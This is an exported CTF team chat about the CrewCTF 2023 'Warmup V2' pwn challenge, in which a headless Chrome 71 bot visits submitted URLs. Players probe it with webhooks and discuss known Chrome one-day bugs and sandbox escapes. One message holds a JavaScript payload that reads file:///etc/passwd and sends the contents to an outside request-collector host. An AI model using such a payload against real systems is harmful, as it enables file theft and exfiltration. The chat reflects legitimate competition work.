Guild icon
Project Sekai
🔒 CrewCTF 2023 / ❌-pwn-warmup-v2
Avatar
Warmup V2 - 1000 points
Category: Pwn Description: Let's Warmup again! hehe Notes: No file given on this time nc 35.189.210.103 18001 Files: No files. Tags: No tags.
Sutx pinned a message to this channel. 07/07/2023 11:00 PM
Avatar
@nyancat0131 wants to collaborate 🤝
Avatar
@Surg wants to collaborate 🤝
Avatar
ok, when its not dead
00:00
it takes a link and takes a "screenshot"
00:01
youtube not exclusive, im trying a webhook link rn
Avatar
@Zafirr wants to collaborate 🤝
Avatar
its a little dead rn
Avatar
Instantly generate a free, unique URL and email address to test, inspect, and automate (with a visual workflow editor and scripts) incoming HTTP requests and emails
01:15
im not entirely sure what it wants us to do blind here
Avatar
yeah idk either
Avatar
they updated description right
Avatar
yeah tho we already figured that part out...
Avatar
it just makes a normal looking GET request from the site
01:41
idk if I (someone) should try and set up some webserver to see if it has more interesting repsonses if there's data to pull
01:41
binaryless pwn sucks
Avatar
it runs javascript
01:42
im seeing if i can read file://flag.txt
Avatar
cant even read /etc/passwd (edited)
02:29
i'll try again later
Avatar
@rubiya wants to collaborate 🤝
Avatar
nyancat0131 07/08/2023 2:57 AM
can we XHR?
Avatar
what is xhr
Avatar
GET /x HTTP/1.1 Host: rubiya.kr:31337 Connection: keep-alive Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/71.0.3542.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Encoding: gzip, deflate
Avatar
nyancat0131 07/08/2023 2:57 AM
making a request haha
Avatar
chrome is 71
Avatar
<script>fetch("file:///etc/passwd") .then((res) => res.text()) .then((text) => { window.location="https://asdfasdfasdf.free.beeceptor.com/" + text }) .catch((e) => { window.location="https://asdfasdfasdf.free.beeceptor.com/" + e })</script>
02:58
this is what i tried
Avatar
nyancat0131 07/08/2023 2:58 AM
chrome 71 huh
02:58
maybe oneday?
Avatar
maybe
03:05
i think 5782 is good enough
03:05
inside the report
03:05
there's code too
Avatar
not sure works in linux
Avatar
nyancat0131 07/08/2023 3:10 AM
do we need sbx though
03:10
since no binary
03:11
i doubt we would need sbx
Avatar
nyancat0131 07/08/2023 3:23 AM
I think
03:23
if it's stable release
03:23
then we got the binary
03:23
just need to pwn it...
03:24
but i dunno if we need sbx if we have to do that
Avatar
nyancat0131 07/08/2023 4:35 AM
maybe someone with browser knowledge can try to pwn it
Avatar
sbx == sandbox escape?
Avatar
nyancat0131 07/08/2023 5:00 AM
ye
05:00
but i cant find a poc that can spawn shell on --no-sandbox yet
05:00
so someone if have skill can try it
05:00
i provided the binary
05:00
pretty sure this is the one
Avatar
ill try again later
Avatar
@irogir wants to collaborate 🤝
Avatar
im too lazy to do this one
19:45
it should just be a 1 day
19:45
peepoo
Avatar
@snwo wants to collaborate 🤝
Avatar
nothing is working
22:24
cve-2019-7582 seems not work (edited)
Avatar
Contribute to o0xmuhe/headless_chrome_demo development by creating an account on GitHub.
22:25
one of these might work
22:26
i rmb getting crash
22:26
also the math.expm (-0) bug still works as well
22:29
[*] corrupt_buffer.backing_store : 0x3ff199999999999a
Avatar
xd
Exported 73 message(s)